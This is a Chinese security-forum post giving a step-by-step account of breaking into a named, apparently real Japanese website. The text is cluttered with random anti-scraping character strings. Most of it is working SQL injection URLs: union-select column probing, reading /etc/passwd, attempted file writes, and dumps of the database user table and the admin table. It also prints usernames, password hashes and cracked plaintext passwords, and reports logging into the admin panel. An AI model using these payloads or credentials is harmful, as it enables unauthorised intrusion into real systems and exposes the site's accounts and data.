找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3210|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
. N  ]$ R2 M5 d! i0 B0 W# ~

& e# K" d$ e  h( t' \! c0x01. 检测 www.zuaa.jp 收集数据: P4 |- H3 ?# R+ `$ ~' @) L$ ~4 D9 \7 P

$ H3 J' n7 \3 y2 M# @. c8 @: D" P8 g( V. p2 U3 _
whatweb! G+ \$ U, A, I" Z/ ]% [+ l

4 L# \! V- U) o% i; B# a* s
* E/ c" G1 W; K& T8 g$ E, |0 g3 _利用NMAP扫描, ]9 Q# D1 H" p/ E
/ R/ ?) o8 k6 |
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
: H) j" q4 Z5 k9 u  x4 C# ~0x02.找注入点
$ j0 m; m+ m$ V; V找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
7 e' C" W- {8 \, G- Q0 e5 R
! f: ]3 X3 r. p* [% J, a9 w/ U
% @( Q- h0 X* J, l/ i0x03.order by
4 z, S7 L4 i% l* T) a) |) L             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 10 z6 o1 s# }7 U" N3 e
  x) Y* x5 f$ `4 A
order by 28报错,order by 27正常/ G5 \3 y  N+ E$ x* v9 m; L
  c/ \; s- s9 `( k- K
0x04.   union手动查询0 Q9 ?' Q5 E$ Z
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
1 z; b: ]; w0 M添加到 27 时正常显示 6 y% B" B9 y2 p4 [0 q& x

) H/ M3 v" }+ \) e  g中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持# a6 q' L, ^5 l' i+ J9 y

+ W' h* r( W( i; }/ s0x05. info:
8 Z' y! y* F( |* u. G! m7 Jhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 % P3 s" E: E6 A) h' T( Y) n, k  T2 B: Y

. j2 J$ f) W% N- Xuser:            root@localhost$ O! k6 i) \5 x3 A6 C1 J+ ?3 j
database:    openpne
: l; R" |( h, Q" f$ }) |version:      4.1.22
: Q- z5 b( k4 D$ T% |5 H7 ^# f4 `os:             portbld-freebsd5.4
) {. b& k1 ]9 ]. ]: f: n7 I. ?- N2 B. M" [+ f1 a0 l1 V4 i! m
0x06. root用户
; T, M) ^9 E' j% V4 u  X# q7 r3 g' b利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)" I  `# K, P$ p  E. [- ^, A  P
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
4 x0 Y5 b  S/ p0 x* o" C. f% ]
8 l5 U6 s, [+ p/ l3 l* z7 W: X通过工具转换3 E  Q- X% y6 ?5 \
5 J6 H& X+ ^0 S7 Y  S& I
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持0 d' r7 q1 a5 Y
* m% k$ ^: e) ]; E- X
0x07. 利用 into outfile; J( Z5 ?9 ^" n- |7 _1 W0 P
全部都失败  J( b8 W1 ^% E% d; ~
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php+ e0 M4 a# p/ t6 y& ?& q

/ P2 D5 |9 E" y9 S8 K8 vhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
: a2 c- T4 s2 X% `$ x' T3 G
. H8 J$ t3 W6 {页面显示“MDB2 Error:syntax error”
  I6 C9 C- n+ z% S; G+ L( J1 K. h, x4 |
# F3 L( a  Q+ K0x08. 利用 mysql 4.1
& N% J3 y+ }! e7 L/ ^猜常规表名,字段未果 工具 sqlmap$ s( M' u8 a7 Y
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
2 G. b6 ~7 {) O0 y) ^' V( ^2 C
, Q- G0 C( @& Q+ y0 _* x8 y4 ^$ j

1 G. y: j7 o' \; d  z& d$ V' c) C0x09. 查找后台
1 _$ E2 I# K( R. h利用 现有的各种 后台工具尝试都不行- A. s- X" `6 M. @- i; A: Y

5 D) V# j) v* s: A0x10.  MySL外联方法
; `1 w8 }& {9 S0 R9 P从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
. f8 @9 P6 O' ?0 _可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
% I9 n, p5 ]! ?% Y& W; B# Z3 chttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
9 t1 F. M) N* o9 C! P) L4 X& r3 S- e. j" I9 m6 e
这个可以在 www.cmd5.com 解密" p  z$ p+ n/ s
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
" A- @5 i. @$ y8 }chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
# t" d- b; f- t, xopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
+ H6 G$ c' O/ p  q7 ?7 H5 X# ^zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???: X% h. L/ d' O+ y
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
: {6 ~/ h8 [& n, f- K; _: G8 D  ?1 l1 W6 e* F2 N
' V0 v. s; h' x( J3 I: ]0 N* v5 x
0x11. 网站突破/ o/ e/ ~% R8 Y( o. j/ Q. K/ h
发现网站的源程序 openpne, google 下载 openpne 源码
& M; e: E7 A% V( U+ t1 `& V  u
5 n  [5 R2 R, @# N" Z. q, r
0x12. 默认信息利用0 a! y/ e. w# t' Z6 D
http://sns.zuaa.jp/?m=admin&a=page_login: O# o) h6 i% Y
8 x) d- r0 z/ ?& e  r  u
表名 (c_admin_user) ,字段名(username,password)
% F  s' [/ _' G1 `; o) Vhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user- y2 w/ G( R2 U0 R$ @+ ]. K& {

3 {6 O: R$ o- b( U" e1 D" ?8 |解密. {6 H) E0 z+ \+ V1 U5 e* ^
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009) k9 y* }( ^9 Y: D* o
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
) G9 L: o( r; h) l5 j# _' G/ f* z8 j  e8 J, S. f
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持# I/ S" c! X( X  [8 o8 f
7 S8 {8 O" P# [2 N$ T% ^/ Q; `
0x13. 登录后台+ i  }6 }. {% v4 b  Q& N* D
# @1 R/ F5 J" Q6 A: M0 P. }

$ j/ m9 I+ ~  z4 N( E$ o) N$ B$ a4 M1 h/ n# F% }
0x14. 小结
( T/ ?6 L6 J0 L4 i利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
- A6 a( p6 S7 I+ J感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点1 r. V3 A' ^, C: Z* o
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain2 b0 `! L$ x* u
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
/ p3 n6 j' K$ y' W: J! [! Y1 t4 }' ~. O6 j* V
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
& d7 N& \+ |, O4 y# O

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表